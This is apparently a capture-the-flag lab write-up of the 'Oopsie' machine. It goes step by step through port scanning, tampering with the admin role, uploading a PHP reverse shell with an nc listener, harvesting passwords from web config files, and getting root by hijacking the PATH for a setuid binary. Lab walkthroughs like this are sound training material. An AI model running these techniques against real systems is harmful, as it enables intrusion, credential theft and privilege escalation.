Oopsie
1. Reconnaissance
nmap -sC -sV 10.129.233.184
ORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 61:e4:3f:d4:1e:e2:b2:f1:0d:3c:ed:36:28:36:67:c7 (RSA)
| 256 24:1d:a4:17:d4:e3:2a:9c:90:5c:30:58:8f:60:77:8d (ECDSA)
|_ 256 78:03:0e:b4:a1:af:e5:c2:f9:8d:29:05:3e:29:c9:f2 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Welcome
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
There are two services running, so we start testing the http server. We go to the web server http://dest-IP:80, where we face a website for automotive. To spot some directories and files that are not visible, we can use Burp and set intercept off. After that, we login as guest and in the inspect element view, we set the role=admin and user=34322 that can be found in the account tab.
Hereafter, we go to the Uploads tab and observer that files can be uploaded.
2. Weaponization
- php-reverse-shell.php In order to upload a php reverse shell, we configure our IP. That file is located at /usr/share/webshells/php/php-reverse-shell.php
3. Delivery
Now we go to the Uploads tab in the webserver and upload the php-reverse-shell.php modified. To find the path where the file is uploaded, whe use gobuster
gobuster dir --url http://{TARGET_IP}/ --wordlist /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -x php
We find the folder /uploads/ With the aim of obtaining a reverse shell, we use ncat
nc -lvnp 1234
And now, we go to the browser and request our shell through the browser http://{TARGET_IP}/uploads/php-reverse-shell.php. With that obtain a reverse shell.
4. Exploitation
Now whe have a shell but is not functional yet, so we have to spawn a TTY. This TTY, allows users to interact with the system.
There is a singnificant difference between the following concepts that we should bear in mind:
- terminal = tty = text input/output environment
- console = physical terminal
- shell = command line interpreter
To stablish a tty on a terminal, we enter:
python3 -c 'import pty;pty.spawn("/bin/bash")'
Because our user's role has restricted access on the system it's important to find a way to do a lateral movement. For this and since the website is making use of PHP and SQL, we can enumerate further the web directory
cd /var/www/html/cdn-cgi/login
cat * grep -i passw*
Fortunately we find the password MEGACORP_4dm1n!!. Now we can check the available users on the system by reading the passwd file
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
syslog:x:102:106::/home/syslog:/usr/sbin/nologin
messagebus:x:103:107::/nonexistent:/usr/sbin/nologin
_apt:x:104:65534::/nonexistent:/usr/sbin/nologin
lxd:x:105:65534::/var/lib/lxd/:/bin/false
uuidd:x:106:110::/run/uuidd:/usr/sbin/nologin
dnsmasq:x:107:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
landscape:x:108:112::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:109:1::/var/cache/pollinate:/bin/false
sshd:x:110:65534::/run/sshd:/usr/sbin/nologin
robert:x:1000:1000:robert:/home/robert:/bin/bash
mysql:x:111:114:MySQL Server,,,:/nonexistent:/bin/false
We try the password with robert but it is'n for that user. So we read one by one the files at /cdn-cgi/login and we found another password in db.php M3g4C0rpUs3r! that allow us to login as robert
su robert
The user flag can be found now. Now we check our privileges and notice that user robert can't use sudo.
sudo -l
So we try to find if robert is part of any interesting group
id
We observe that robert is part of the group bugtracker, so lets find any binary withing that group
find / -group bugtracker 2>/dev/null
# 2>/dev/null filter out the error so that they will not be output to the console
And a file named bugtracker is found, so we check what privileges and what type of file is it.
ls -la /usr/bin/bugtracker && /usr/bin/bugtracker
-rwsr-xr-- 1 root bugtracker 8792 Jan 25 2020 /usr/bin/bugtracker
/usr/bin/bugtracker: setuid ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/l, for GNU/Linux 3.2.0, BuildID[sha1]=b87543421344c400a95cbbe34bbc885698b52b8d, not stripped
There is a suid set on that binary, which is a promising exploitation path. Now we run the application to observer how it behaves.
/usr/bin/bugtracker
------------------
: EV Bug Tracker :
------------------
Provide Bug ID: 2234 # This is an example to see how it works
2234
---------------
The tool accepts user input as a name of the file that will be read using the cat command, however, it dows not specifies whole path to file cat and thus we might be able to exploit this. We navigate to /tmp directory and create a file named cat with the content /bin/sh. The we set the execute privileges.
touch cat
echo /bin/sh > cat
chmod +x cat
In order to exploit this we can add the /tmp directory to the PATH environmental variable.(PATH is an environment variable on Unix-like operating systems and Microsoft Windows, specifying a set of directories where executable programs are located).
export PATH=/tmp:$PATH
Finally, we execute the bugtracker from /tmp directory and now we are root user because cat has been executed as root (remember the setuid and the s from -rwsr-xr--). The root flag can be found in the /root folder.